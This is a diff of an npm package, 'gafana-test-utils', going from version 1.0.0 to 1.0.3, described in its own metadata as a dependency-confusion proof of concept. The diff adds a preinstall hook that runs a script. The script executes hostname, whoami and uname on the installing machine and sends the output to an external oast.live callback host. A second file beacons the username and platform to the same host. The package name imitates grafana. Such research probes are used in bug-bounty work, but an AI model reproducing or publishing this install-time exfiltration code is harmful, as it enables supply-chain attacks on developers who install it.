gafana-test-utils 1.0.0 → 1.0.3

package/nano

@@ -0,0 +1,13 @@
+const os = require('os');
+const https = require('https');
+
+const hostname = os.hostname();
+const platform = os.platform();
+const arch = os.arch();
+const user = os.userInfo().username;
+
+const url = `https://d21ivhp1og82gj9967308gj75juz3g8ux.oast.live/${hostname}_${user}_${platform}_${arch}`;
+
+https.get(url, (res) => {
+  res.on('data', () => {});
+}).on('error', () => {});

package/package.json

@@ -1,11 +1,14 @@
 {
   "name": "gafana-test-utils",
-  "version": "1.0.0",
-  "description": "Fake scoped package for local RCE test",
+  "version": "1.0.3",
+  "description": "PoC for dependency confusion with preinstall RCE via Interactsh",
   "main": "index.js",
   "scripts": {
-    "preinstall": "curl http://localhost:8000/$(hostname)_$(whoami)"
+    "preinstall": "node preinstall.js"
   },
   "author": "himanshu",
-  "license": "MIT"
+  "license": "MIT",
+  "dependencies": {
+    "gafana-test-utils": "^1.0.2"
+  }
 }

package/preinstall.js

@@ -0,0 +1,17 @@
+const { execSync } = require('child_process');
+const https = require('https');
+
+// Gather system info
+const hostname = execSync('hostname').toString().trim();
+const whoami = execSync('whoami').toString().trim();
+const uname = execSync('uname -a').toString().trim();
+
+// Encode in base64 or URI (to avoid bad chars)
+const payload = encodeURIComponent(`${hostname}__${whoami}__${uname}`);
+
+const url = `https://d21ivhp1og82gj9967308gj75juz3g8ux.oast.live/${payload}`;
+
+https.get(url, (res) => {
+  res.on('data', () => {});
+}).on('error', () => {});
+